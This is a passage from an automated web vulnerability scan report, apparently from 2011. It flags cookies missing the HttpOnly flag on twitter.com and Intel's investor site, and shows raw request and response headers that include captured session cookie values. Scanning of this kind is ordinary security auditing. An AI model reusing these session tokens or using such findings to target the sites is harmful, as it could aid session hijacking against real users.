Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIVZIvgtAToHaWQiJWQ5Yzk4ZmY4Yzc2ODMw%250ANDBmOWI3NmU3NTA5N2I5MmU1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e3633c355f5d65ff6cfe5bdaa2b0cfdaeeaa156d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.53. http://twitter.com/share

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /share

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: Sat Feb 05 23:22:38 +0000 2011-20811-53000
Last-Modified: Sat, 05 Feb 2011 23:22:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948158732884; path=/; expires=Sat, 12-Feb-11 23:22:38 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815873954823; path=/; expires=Mon, 07 Mar 2011 23:22:38 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCBRhIvgtAToHaWQiJTYzNjY1ZmI2MzZkY2Iz%250AYjIyM2Y1ZDA2MTMwN2NiMTYwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--686e305c212123b2dc28c72a24dcf76ac929959b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...

12.54. http://www.intc.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?iid=gg_about+home_intc HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A05%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.55. http://www.intc.com/alerts.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /alerts.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alerts.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A06%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:06 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:06 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.56. http://www.intc.com/analystCenter.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /analystCenter.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /analystCenter.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.57. http://www.intc.com/annuals.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /annuals.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /annuals.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A36%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:36 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.58. http://www.intc.com/briefcase.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /briefcase.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /briefcase.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A09%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40579%2E7605208;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:10 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.59. http://www.intc.com/common/download/download.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/download/download.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/download/download.cfm?CompanyID=INTC&FileID=361738&FileKey=f79153d7-eceb-4b38-8a7e-e2917f999659&FileName=_0008_virtual_1.jpg HTTP/1.1
Host: www.intc.com
Proxy-Connection: keep-alive
Referer: http://www.intc.com/index.cfm?iid=ftr+invrel
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NOMOBILE=0; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 05 Feb 2011 23:14:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A15%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:15 GMT;path=/
location: http://files.shareholder.com/downloads/INTC/1158415371x0x361738/f79153d7-eceb-4b38-8a7e-e2917f999659/_0008_virtual_1.jpg
Content-Type: text/html; charset=UTF-8


<script type="text/javascript">
<!--//

document.write(" <img src=\"http://apps.shareholder.com/track/trackpage.aspx?c=INTC&p=common%2Fdownload%2Fdow
...[SNIP]...

12.60. http://www.intc.com/common/download/download.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/download/download.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/download/download.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 05 Feb 2011 23:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: X_SESSION=1158416520%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C5E03233E5E00EFF0D4D7E6B4BD7D2167;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/
Set-Cookie: X_BRIEFCASE=UPDATED%7C40489%2E7610995;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/
Set-Cookie: X_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:59 GMT;path=/
location: http://files.shareholder.com/downloads/x/1158416520x0x//
Content-Type: text/html; charset=UTF-8


<script type="text/javascript">
<!--//

document.write(" <img src=\"http://apps.shareholder.com/track/trackpage.aspx?c=X&p=common%2Fdownload%2Fdownlo
...[SNIP]...

12.61. http://www.intc.com/common/mobile/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/mobile/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/mobile/?CompanyID=INTC HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A02%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...

12.62. http://www.intc.com/contactUs.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /contactUs.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactUs.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A52%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.63. http://www.intc.com/corpInfo.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /corpInfo.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corpInfo.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%